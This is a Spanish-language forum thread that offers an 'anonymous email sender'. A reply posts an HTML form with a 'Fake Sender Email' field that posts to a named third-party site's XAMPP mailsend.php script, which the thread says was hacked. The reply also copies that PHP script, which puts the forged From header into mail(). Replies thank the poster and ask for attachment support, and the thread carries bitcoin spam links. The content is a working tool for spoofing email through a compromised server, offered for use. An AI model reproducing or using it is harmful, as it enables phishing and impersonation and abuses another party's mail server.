Imagen


This SMTP server was hacked and now using TOR you can send email anonymously without captchas and just by filling the simple form.

Download:
[Enlace externo eliminado para invitados]

Virustotal:
[Enlace externo eliminado para invitados]
Claim, Multiply, Play, Win bitcoins for free - http://bit.ly/2NysYYs
Yo no sabía, gracias a ir a probar y ver cómo va
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
Este escript tiene como remitente un correo como postmaster

Aqui les adjunto el script en el cual pueden especificar el correo que quieren que aparezca como enviado.
<html>
<head>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<br><br>
<br><br>
<body>
<div align="center">
  <table width="575" border="0" cellpadding="0" cellspacing="0">
    <tr><td  align="left" valign="top" class="tpl_body">
<center>
<title>Electrify Anonymous Email Sender</title>
<center>
<br><br><br>
<h2>Anonymous Email Sender</h2>
<table>
<form method="post" action="http://www.dmkg.de/xampp/mailsend.php" target="1">
<tr><td>Fake Sender Email:</td><td><input type="text" name="knownsender" size="40" value="[email protected]"></td></tr>
<input type="hidden" name="ccaddress" size="40">
<tr><td>Destination Email:</td><td><input type="text" name="recipients" size="40" value="" placeholder="[email protected]"></td></tr>
<tr><td>Subject:</td><td><input type="text" name="subject" size="40" value="" placeholder="Hello!"></td></tr>
<tr><td>Message:</td><td><textarea rows="2" name="message" cols="42" placeholder="Hi, this is a message"></textarea></td></tr>
<tr><td></td><td><input type="submit" id="button" value="Send"></td></tr>
</form>
</table>
<br><br>
(After pressing "Send" wait a 1 second and close or hit "Send" again to send another email)
</center>
<br>
    </td></tr>
    <tr>
    <tr>
      <td height="29" align="left" valign="top"><img src="footer.jpg" width="700" height="38" /></td>
    </tr>
  </table>
<br><br>
</div>
</body>
</html>

Los parametros que recive el arhivo php es identico a
<?php
    include "langsettings.php";
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
<html>
    <head>
        <meta name="author" content="Kai Oswald Seidler, Kay Vogelgesang, Carsten Wiedmann">
        <link href="xampp.css" rel="stylesheet" type="text/css">
        <title><?php echo $TEXT['mail-sendnow']; ?></title>
    </head>

    <body>
        <br><h1><?php echo $TEXT['mail-sendnow']; ?></h1>
        <?php
            if (empty($_POST['knownsender'])) {
                $_POST['knownsender'] = '';
            } else {
                $_POST['knownsender'] = str_replace(array("\r\n", "\n", "\r", ","), "", $_POST['knownsender']);
            }
            if (empty($_POST['recipients'])) {
                $_POST['recipients'] = '';
            } else {
                $_POST['recipients'] = str_replace(array("\r\n", "\n", "\r", ","), "", $_POST['recipients']);
            }
            if (empty($_POST['ccaddress'])) {
                $_POST['ccaddress'] = '';
            } else {
                $_POST['ccaddress'] = str_replace(array("\r\n", "\n", "\r", ","), "", $_POST['ccaddress']);
            }
            if (empty($_POST['subject'])) {
                $_POST['subject'] = '';
            } else {
                $_POST['subject'] = str_replace(array("\r\n", "\n", "\r"), "", $_POST['subject']);
            }
            if (empty($_POST['message'])) {
                $_POST['message'] = '';
            }
            $mailtos = $_POST['recipients'];
            $subject = $_POST['subject'];
            $message = $_POST['message'];

            if (trim($_POST['ccaddress']) == "") {
                $header = "From: $_POST[knownsender]";
            } else {
                $header .= "From: $_POST[knownsender]\r\n";
                $header .= "Cc: $_POST[ccaddress]";
            }

            if (@mail($mailtos, $subject, $message, $header)) {
                echo "<p><i>".$TEXT['mail-sendok']."</i></p>";
            } else {
                echo "<p><i>".$TEXT['mail-sendnotok']."</i></p>";
            }
        ?>
        <p><a href="javascript:history.back()">Zurück zum Formular</a></p>
    </body>
</html>
I will test the tool at all so thank you for sharing !
"He who fights monsters should see to it that he himself does not become a monster. And if you gaze for long into an abyss, the abyss gazes also into you."
- Friedrich Nietzsche
tremendo aportazo,me encantaria que le agregaran el enviar archivos adjuntos.
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
Responder

Volver a “Auditoria Web”